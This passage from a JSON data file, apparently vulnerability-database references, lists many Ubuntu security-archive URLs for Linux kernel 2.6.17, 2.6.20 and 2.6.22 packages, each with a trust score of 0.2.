        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-generic_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-generic_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-cell_2.6.22-14.51_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34.dsc"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-generic_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-ume_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-xen_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14_2.6.22-14.51_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc64-smp_2.6.22-14.51_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-virtual_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
